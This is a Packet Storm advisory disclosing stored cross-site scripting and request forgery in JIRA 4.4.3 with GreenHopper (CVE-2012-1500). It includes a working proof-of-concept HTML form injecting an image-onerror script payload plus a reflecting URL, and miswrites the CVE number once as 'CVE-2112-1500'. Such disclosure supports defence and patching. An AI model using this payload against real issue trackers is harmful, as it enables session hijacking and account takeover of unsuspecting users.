exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

JIRA / GreenHopper Cross Site Scripting

JIRA / GreenHopper Cross Site Scripting
Posted Sep 4, 2012
Authored by sqlhacker

JIRA version 4.4.3 with GreenHopper version 5.9.8 suffers from cross site request forgery and stored cross site scripting vulnerabilities.

tags | advisory, vulnerability, xss, csrf
advisories | CVE-2012-1500
SHA-256 | eb467b467fc6222efa2c041bb7e3071fc8edfe9cce34a13f350ebc31b450647b

JIRA / GreenHopper Cross Site Scripting

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA256


CVE-2012-1500, Stored XSS in JIRA v4.4.3#663-r165197, GreenHopper
–Resolved in Version 5.9.8, Proof of Concept
External References: CVE-2112-1500 CVE-2112-1500 XSS.Cx Blog GHS-5642
Reported to Vendor on Mar 7, 2012, Resolved 8/22/2012
XSS.Cx Research Award to Reporter: 1250 Euros

Introduction

JIRA (/'d???r?/ JEER-?) is a proprietary issue tracking product,
developedby Atlassian, commonly used for bug tracking, issue tracking,
and project management. It has been developed since 2002. JIRA is a
commercial software product that can be licensed for running
on-premises or available as a hosted solution.

GreenHopper - GreenHopper unlocks the power of Agile, whether you're a
seasoned Agile expert or just getting started. Creating user stories,
estimating those stories for a sprint backlog, identifying team
velocity, visualizing team activity and reporting progress has never
been so easy.

Exploit

The Anonymous Researchers discovered a Stored XSS vulnerability
allowing an attacker to inject arbitrary script code into an existing
and fully patched JIRA + GreenHopper installations (JIRA=V4.4.3,
GreenHopper prior to V5.9.8). The requirements for a successful attack
are minimal. A user logged into the targeted JIRA issue tracking
system needs to be convinced to visit an attacker controlled link.
Once that link has been visited by the unsuspecting victim, an
invisible form will perform a POST request and the victim will be
redirected to a URL where username, password and login credentials
such as cookies can be read and processed by the attacker. An attacker
can obtain access to privileged accounts and get control over the JIRA
issue tracker and connected systems.


Proof of Concept Exploit Code


Proof of Concept `

// Form to inject payload via CSRF
// Note: No CSRF tokens required
<form action="https://sandbox.onjira.com/secure/UpdateFieldJson.jspa"
method="post">
<input type=submit value="XSS">
<input name="colPage" value="1">
<input name="decorator" value="none">
<input name="fieldId" value="summary">
<input name="fieldValue" value="<img src=x onerror='alert(domain+/ --
/+cookie)'>">
<input name="id" value="20633">
<input name="key" value="TST-3785">
<input name="pageType" value="PlanningBoard">
<input name="selectedBoardId" value="10000">
<input name="selectedProjectid" value="10000">
<input name="stepId" value="10000">
<input name="subType" value="VersionBoard">
<input name="type" value="VB">
</form>


// URL reflecting the injected data

https://sandbox.onjira.com/secure/EditField.jspa?id=20633&stepId=10000&fieldId=summary&decorator=none&selectedProjectid=10000&pageType=PlanningBoard&subType=VersionBoard&type=VB&selectedBoardId=10000&colPage=1&_=1330437353767


Report proofed by 0xC8CA08F4 at Mar 07 08:49:59 EDT 2012.


-----BEGIN PGP SIGNATURE-----

Version: PGP Desktop 10.2.0 (Build 2599)

Charset: utf-8


wsBVAwUBUETjrHz+WcLIygj0AQiagAf+KRj8yHe/ozwRj/SrzO6sD9mfqs/sk1D8

MHS2BSe5NoqK3EDz6gksCj7im7pgD/1d1KkOj7b+B+6e9HfkNvZ7oOTxM5xPmgwd

9hWL2ogkIy8d5tqqpQ5DvmBsgp0COBFTU/hQLHzw6wp9frX+dSa0V9Z4yJNS96a1

y3kNdviYlYNbQ9g/8WER7QxsWD5Qc1oNeByItrZNeHjsa4Ma2XiL48uc9K938EJe

oHIWWBQK5AT08zQdpVcvtUpR18VO9qh2iIiP5Ucni9/A8SW+hKfTdOF/vBHzErqC

Kr2sMRRh2IvTJ8VWLepTKKxpurv6JK5lMKH3VIw/OGlKrqlAXIW/2g==

=ahFt

-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close